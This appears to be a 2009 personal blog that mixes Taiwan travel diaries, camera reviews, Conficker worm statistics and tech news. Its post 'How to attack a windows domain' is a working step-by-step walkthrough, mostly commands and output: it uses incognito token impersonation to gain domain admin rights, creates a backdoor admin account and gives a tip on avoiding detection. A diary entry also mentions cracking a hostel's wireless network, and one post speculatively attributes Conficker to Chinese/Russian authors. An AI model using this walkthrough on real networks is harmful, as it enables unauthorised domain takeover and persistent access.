Best Digital Camera (Compact) Of the Year, period. I am one of the proud LX3 owner and this baby rock.
This article is dedicated for someone who interest in learning Photography, starting with LX-3 ( ^_^ )
June 7, 2009
November 11, 2009
Taiwan Trip – Day #2
Collapse after went back to hostel last night. Too tired d. Brought some heat rub and vitamin C at Watson nearby, hoho…the Watson here is 5 storey high @_@
Draft itinerary before i forgot :->
Morning
Wake up. Raining outside. tidy out my room (and myself)
Went out at 11am. Decided to go for a movie at Xi men Ting. Finding the IMAX cinema (very deep inside). Brought a combo meal (bad choice $$).
The ticket price is NT 210 alone. With combo meal the price jump up to NT 370. The combo got one large coke, popcorn (suck big time) and a big hotdog.
Walk around the area until near starting time. Go back to counter to collect my meal (with a tray, lol). The cinema attendant shouting at the counter for what movie is going to screen and which door.
I bring my whole tray go inside. Only 4 person in the cinema, lol…Movie start quite on time.
What movie I watch? Neon Genesis Evangelion 2.0 : You Can (Not) Advance.
How about the movie? Best anime movie I watch in my life. You really need big screen to appreciate it. Totally awesome. 11 out of 10 !!! (one mark extra for getting a good subtitle 
)
After movie, decided to go for shopping at Guan Hua area. Went there. Most of the shop was close due to out of no reason. (It wasn’t a public holiday)
No choice but I walk around the area and checking out the rest of the computer shop. Price wise, not that cheap that I expect 
At most 10% cheaper than Malaysia. But I can find more variety here.
GF-1, the Lumix Micro 4/3 camera that I dream of is selling at NT 26800 here, which around RM 600-700 cheaper than Malaysia promo price, but the current promotion in Malaysia include an extra original battery and free case…Argh…dilemma. I should save myself from spending like this again.
Spent hours there walking around the area and looking for good stuff. There is a mouse that I always wanted to buy, the Elecom finger tips mouse…NT 1590 here…hmm.
Have some rest and food at Burger King nearby. There wasn’t any chili sauce? Only tomato sauce? Damn. Finish eating, you have to separate your trash and throw them into the proper bin for recycle, hope Malaysia implement this as well, I will love to contribute to earth more XD
Decided to go to 101 Tower after this. Took the train and then a shuttle bus…I in 101 tower d. Public Transport here is really good. Bus is very very frequent here. 101 Shopping complex is like Pavilion KL, only “Branded” stuff there.
Since today weather is good (no raining !!) Going up to the observation tower seem to be a good choice. A NT 400 choice. LOL.
Too bad there is many aunty/uncle from China (smelly one some more) come in tours group. I can see the hopeless look from the Taiwan security guard and attendant. Those aunty/uncle really no manner. I look at the young security guard and we smile at each other after seeing those China ppl try to rush into the lift.
The ratio of Leng Lui in Taiwan is superb. I think is got to do with the fashion sense and the population in Taiwan. Imagine malaysian chinese is same number as taiwan population…hoho…Why I say so? because all the life attendant is really good looking. Even with the mask on !!!
The lift is the fastest in the world. Which is over 1km/min. Taiwan really look alive up there. The light and view is really nice. But what best is the outdoor observation platform. It was really windy and cold there. Best of all, the Japanese gal beside me drop her camera from there. Yes, no kidding, from over 90 storey height…LOL…I help her explain the situation to the security guard but we can’t do anything…of coz la !!!
After coming down to the ground. I went to the Chen Ping Bookstore, the main branch and the largest in Taiwan. Really really nice place. Operate 24/7. Yes, is a 24 hour bookstore, where almost every book you can read inside the bookstore, sitting/standing around the store and no one will scold/question you !!! Really really nice ambient and feel. And I bet it have one of the most complete Chinese book around. I brought another 2 book again 
One by Chris Anderson, FREE.
Dragging myself back to the hostel. The time is already way past 10pm. Finding a restaurant that still open…until i stumble upon a small Beef noodle store which look nice. The boss is quite young and helpful. Chit chat for awhile and eat the noodle XD. The noodle was so-so but the beef is good. nice texture and the soup is full of beef taste…
Take a bath at hostel. Too tired. Jin is collapse.
Hopefully I didn’t make too loud music at night and disturb my roommate
November 10, 2009
Taiwan Trip – Day #1
Basic (draft) Itinerary:
0715 – Depart from Home
0800 – Pick up friend at Puchong (drive back my car)
0830 – Stuck in a stupid jam @ way to LCCT (Truck flip over)
0850 – Check in @ LCCT – Air Asia to Taipei
0910 – Went through the Custom check and notice the flight is full of people (Air Asia X, good job Tony !!)
0940 – Gate finally open (delay 20min?)
1020 – Plane started the engine (and so does the two uncle sitting beside me)
1030 – Lift off with 380++ people. I sitting in the middle row. Is hot and sweaty. And the seat really cramp/small.
1110 – Lunch cart arrived. Got my “special order” BBQ chicken (yum yum~ i haven’t eat breakfast)
1130 – Finish my meal. Quite easy to eat as chicken is boneless and have lot of vege. Quite okay for flight food. Thanks for order for me 
1145 – The two uncle beside me talk non-stop even since they sit down. Wanted to play my psp but batt went dead. Try to sleep.
1200 – The two uncle still talk talk talk. Seat is so small so I need to move my shoulder side a bit to avoid touch the uncle (he some more cross his hand !!)
1201 – Still talking. I have no choice but eavesdropping. Hmm, apparently they are quite high rank. Working as sale line i guess?
1230 – Just notice this two uncles is quite update with hi-tech stuff. Wah, talk about PS3 and Plasma TV, and even wanna try install windows 7 starter edition on the company pc.
1245 – They are still talking. So I make my move. I try to join the conversation.
1300 – Some silent now.Haha.
1310 – Now they talk about their kid and how young their kid get their glasses.
1315 – I give up. Stand up and went into the toilet and walk around.
1330 – Just notice toilet got 110v power socket (hair dryer?) Should have charge my psp using this.
1345 – The uncle still talk. I try to jump into conversation with different approach. A little bit of silent.
1400 – Thirsty now, talk too much. Order Oldtown white coffee @ RM6. Bad choice. I just realize drink caffeine stuff dehydrate your body further, It is written in the Air Asia Booklet. Read it when I was drinking the coffee.
1440 – A very rough landing. Still thirsty.
1445 – Get off the plane @ Terminal 2 (just found out Taipei got 2 terminal)
1510 – Done my passport check and walk down the hall to city bus counter.
1515 – Pay TWD 140 for the bus fare – Free Go Express Bus (Airport – Taipei)
1518 – Bus uncle here very helpful. He told me that there is a direct bus to my staying place and ask me to wait for 1530 bus. He even show an old lady a seat to wait for the bus (thumb up)
1540 – Bus come late. Went on the bus, only 10 people on the bus. I guess mostly HK/SG ppl as they speak Cantonese.
1600 – Bus is call Free GO which rhythm in chinese as Flying dog. Hence the bus logo is a dog.
1610 – Passing through the country side. Weather is quite hot (29’C) Road condition is just like Malaysia. Got bump sometime. The countryside feel like Ipoh where houses and temples are build along the hill.
1620 – Saw some really awesome stuff. There is one building is being powered via wind and solar energy.
1650 – I am the last man on bus. The uncle chit chat with me and drove me direct to the front door of the hostel.
1700 – Check in Hostel. Pay the remaining TWD 1810 (TWD 100 for key deposit)
1720 – Unpack my stuff.Crack the wireless around the hostel (free one hang d ). Hurray, online via my eeePC 701. Speed is like 4Mbps.
1750 – Charge my cloth to Dry fit polo-T and short pant. Check my itinerary today, I should be on plan.
1800 – Updated Facebook message and reply email.
1820 – After finish install all necessary software for my eeePC, say goodbye to my Thai roommate (from Bangkok) who have been here since last week.
1830 – Chit chat with the dorm guardian jie jie (lady boss?) and snap a Polaroid. Roughly ask some direction to Shi Da Night market.
1850 – Manage to reach Xi Men Din Station after asking around. Ppl here quite helpful huh.
1900 – Brought a You You card for TWD 500 (TWD 100 for deposit). Ask the guard after how to go to night market. He also not sure =_=
1905 – Got myself a simple MRT map for reference. Just go la…follow my instinct.
1920 – Guess I very good at this. Reach the Taiwan electric Building station smoothly. I am totally blend into normal Taiwanese life
1940 – Took the wrong turn at the wrong exit. Ask a security guard and pointed my the correct direction.
1945 – Learn my lesson. When I not sure. I asked. Got my way right and I started to see swamp of people.
1950 – Shi Da mean University (of teacher). Lot of leng lui here. Or should I say they are better off with their fashion and make up.
2010 – Walk around the market. The market is within the street which similar to Tick-tack-toe.
2030 – Brought some garlic salted fry chicken (TWD 45), 5 jian pao (TWD 30), 1 Soy jelly (?) with nut and pearl ball (TWD 30) and an fully natural flavour ice cream (TWD 55).
2040 – Saw a stall selling Malaysian curry chicken. And lot of people query for some famous stall. (etc: my jian pao XD)
2100 – Leaving the night market. If it is university area, there must be some good bookstore around. Found one and went in.
2140 – Come over with book in hand (XD). Brought 5 book for TWD 882. That after 20% off…cheap cheap XD.
2145 – Found another second hand bookstore, went in again but didn’t get any book. Book price there is crazy. (TWD 10 per book?)
2220 – Reach back hostel. Meet some new folk in the hostel. Eating my jian pao at kitchen. One singaporean (2nd time in taiwan)treat me some really sweet and tasty fruit. I going to buy some taiwan fruit next time i saw them.
2300 – Bath and chit chat with the dorm guardian.
Now – Just finish typing this entry. Going to sleep now.
October 8, 2009
R u Conficker Today?
The daily trend of Conficker worm.
Day Date Total HTTP Hits Unique IP's Unique ASN's Unique GEO's
Monday 2009-10-05 353,374,228 6,177,806 12,578 225
Sunday 2009-10-04 319,116,909 5,848,210 11,625 224
Saturday 2009-10-03 345,899,815 6,115,205 11,740 223
Friday 2009-10-02 324,444,402 5,903,585 12,420 225
Thursday 2009-10-01 311,329,747 6,161,260 12,562 225
Wednesday 2009-09-30 271,927,387 6,370,343 12,584 225
Tuesday 2009-09-29 321,617,133 6,419,746 12,560 224
Monday 2009-09-28 298,942,625 5,784,097 12,335 225
Sunday 2009-09-27 381,931,460 5,893,814 11,595 223
Saturday 2009-09-26 373,511,716 5,991,939 11,656 221
Friday 2009-09-25 420,454,010 6,349,116 12,466 225
Thursday 2009-09-24 359,456,435 6,190,332 12,546 224
Wednesday 2009-09-23 365,905,240 6,344,510 12,490 224
Tuesday 2009-09-22 412,112,235 6,317,103 12,555 224
Monday 2009-09-21 402,866,723 6,228,450 12,480 224
Sunday 2009-09-20 341,461,136 5,718,952 11,621 223
Saturday 2009-09-19 409,631,897 5,960,625 11,714 223
Friday 2009-09-18 395,422,099 6,173,654 12,477 223
Thursday 2009-09-17 429,063,096 6,402,387 12,599 223
Wednesday 2009-09-16 404,947,612 6,239,897 12,599 223
Tuesday 2009-09-15 435,608,525 6,443,852 12,556 223
Monday 2009-09-14 427,108,902 6,420,308 12,530 226
Sunday 2009-09-13 381,846,846 5,769,241 11,617 222
Saturday 2009-09-12 367,351,330 5,958,670 11,706 222
Friday 2009-09-11 217,895,581 5,763,953 12,176 224
Thursday 2009-09-10 323,857,258 6,299,152 12,380 223
Wednesday 2009-09-09 323,932,481 6,346,391 12,525 224
Tuesday 2009-09-08 267,769,518 6,233,405 12,444 223
Monday 2009-09-07 300,297,749 6,140,995 11,948 224
Sunday 2009-09-06 267,938,003 5,647,851 11,182 223
http://www.theregister.co.uk/2009/10/03/conficker_infects_oxford_brookes/
After reading the Deep Analysis of Conficker, we can 99% sure of this worm is crafted by the Chinese/Russian…Only them have the resource and rigid process flow to come up such amazing worm.
We can even sure there is a team of User Experience team that refine the worm and make it more simple to use/attack.
Patch your MS08-067 today?
GF-1 Autofocus Lense
Who say GF-1 got very limited AF lense?
Update the Zuiko 1442 firmware…and that Oly lense focus way way faster in GF-1 than in the slow EP-1 !!!
Take that, the oly fan !!!
Here the whole list of Lense support by GF-1
http://panasonic.jp/support/global/cs/dsc/connect/g1.html
October 3, 2009
How to attack a windows domain
Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.
You can also browse the network neighborhood or use the net view command.
Aquiring and cracking the hashes of your target is generally useful as well.
Enumerate group membership so you know who to target.
Get the usernames in the local administrators group:
C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
————————————–
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.
Enumerate the domain admins
C:WINDOWSsystem32>net group “domain admins” /domain
net group “domain admins” /domain
The request will be processed at a domain controller for domain blackhat.com.
Group name Domain Admins
Comment Designated administrators of the domain
Members
—————————————————
admin_valsmith Administrator
The command completed successfully.
So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.
c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process
[*] Enumerating tokens
[*] Listing unique users found…
Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith
Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON
[*] Service shutdown detected. Service executable file deleted
[*] Deleting service
So admin_valsmith is our target domain administrator and an impersonation token is available to us!
The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.
Next we will utilize this token to gain domain admin rights:
C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c “blackhatadmin_valsmith” cmd
[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process
[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>whoami
whoami
admin_valsmith
So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:
C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.
The command completed successfully.
Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.
C:net group “domain admins” hacked /add /domain
net group “domain admins” hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com
The command completed successfully.
At this point we have control over the domain and can likely log into any workstation which is on the domain.
Some further related reading:
One token to Rule them All: Post-Exploitation Fun in Windows Environments
Security implications of windows access tokens
Meta-Post_Exploitation.pdf
September 30, 2009
WEP Cracking on Eee PC 701 – Dummy Guide
After much fiddling, I manage to find the most simple way to do WiFi WEP cracking on Eee PC.
You don’t even need to know linux
No more typing in command on the terminal and memory all the MAC address, channel , etc.
I gonna update this with screenshot later and adding more WEP cracking technique.
September 29, 2009
Panasonic updates firmware for DMC-LX3: Digital Photography Review
A new firmware version is now announced for Panasonic’s premium manual compact camera, DMC-LX3. Firmware version 2.0 supports several new functions and improves various performance factors to elevate shooting convenience and fun. The firmware also rectifies several minor issues to enhance operation.
The adoption of new algorithms makes it possible to speed up the AF time by approx.20% to 0.50 sec at wide-end. In addition, a 1:1 aspect ratio recording mode is added as a shooting option in addition to the conventional 4:3, 3:2 and 16:9.
A white balance bracket shot is also now available. The new scene mode High Dynamic is newly incorporated in the scene mode, which helps to capture a scene with moderate exposure even though the scene contains both bright and dark areas together. You can select either of 3 options, Standard, Art, or B/W, depending on the desired effect and personal taste to make the photo look natural to artistic. The white balance adjustment performance is greatly improved especially under fluorescent lights, daytime sunlight and low light.
As well as those mentioned above, the new firmware incorporates attractive advancements for enthusiastic photographers. The exposure compensation range as well as its bracket setting is widened. The fixed composition guidelines are now movable to the intended position with the control of cursor or joystick for free framing. Over exposed parts of the picture are shown not only in the preview but also in playback mode. The lens position of zooming and manual focusing is memorized and will resume at this position.
The photographer’s name can be embedded to the EXIF information of the picture and it can be confirmed via the updated PHOTOfunSTUDIO ver.2.1.
September 27, 2009
Conficker Analysis
I going to do some in depth cover on Conficker worm.
Have been dealing with Conficker for the past few worm and I think i better document it down
An Analysis of Conficker’s Logic and Rendezvous Points
http://mtc.sri.com/Conficker/
September 23, 2009
Google Chrome Frame – Chrome in IE
Dun like IE? IE is slow for certain website?
Try this -> http://code.google.com/chrome/chromeframe/
Try use Google Chrome Frame. After install, just change your IE URL from http://www.google.com to cf:http://www.google.com.
You will now enjoy chrome speed in IE !!!
Best use with gmail/facebook and other heavy javascript site.
Here the announcement from Google:
Introducing Google Chrome Frame
Tuesday, September 22, 2009
Today, we’re releasing an early version of Google Chrome Frame, an open source plug-in that brings HTML5 and other open web technologies to Internet Explorer.
We’re building Google Chrome Frame to help web developers deliver faster, richer applications like Google Wave. Recent JavaScript performance improvements and the emergence of HTML5 have enabled web applications to do things that could previously only be done by desktop software. One challenge developers face in using these new technologies is that they are not yet supported by Internet Explorer. Developers can’t afford to ignore IE — most people use some version of IE — so they end up spending lots of time implementing work-arounds or limiting the functionality of their apps.
With Google Chrome Frame, developers can now take advantage of the latest open web technologies, even in Internet Explorer. From a faster Javascript engine, to support for current web technologies like HTML5’s offline capabilities and , to modern CSS/Layout handling, Google Chrome Frame enables these features within IE with no additional coding or testing for different browser versions.
To start using Google Chrome Frame, all developers need to do is to add a single tag:
When Google Chrome Frame detects this tag it switches automatically to using Google Chrome’s speedy WebKit-based rendering engine. It’s that easy. For users, installing Google Chrome Frame will allow them to seamlessly enjoy modern web apps at blazing speeds, through the familiar interface of the version of IE that they are currently using.
We believe that Google Chrome Frame makes life easier for web developers as well as users. While this is still an early version intended for developers, our team invites you to try out this for your site. You can start by reading our documentation. Please share your feedback in our discussion group and file any bugs you find through the Chromium issue tracker.
September 16, 2009
SANS – Cyber Security Risk Report
Seem like there is a fine control on OS level patching cycle/process, the new key point is the third party app.
Web application and client software still remain as a huge entry point. Code review and SDLC education will be critical to all of us
Published: 2009-09-15 by Johannes Ullrich
SANS today released a new Cyber Security Risks report. The report used data from Tippingpoint, Qualys, the Internet Storm Center and input from SANS faculty like Ed Skoudis and Rob Lee.
Some of the key findings include that operating systems are for the large part less and less of a problem. There are few attacks against the operating system itself, and patching has become pretty robust when it comes to the operating system and its core components. However, third party applications (think Adobe, Java, Quicktime) are a big problem, and they are usually not well covered by existing controls.
On the server side, web applications are of course the big entry point for an attacker. In particular the combination of vulnerable web applications and vulnerable client software is frequently used to inject a client exploit into a web application in order to pivot and attack inside the attacked network.
The report includes case studies of actual attacks to underline these points.
For details, see http://www.sans.org/top-cyber-security-risks
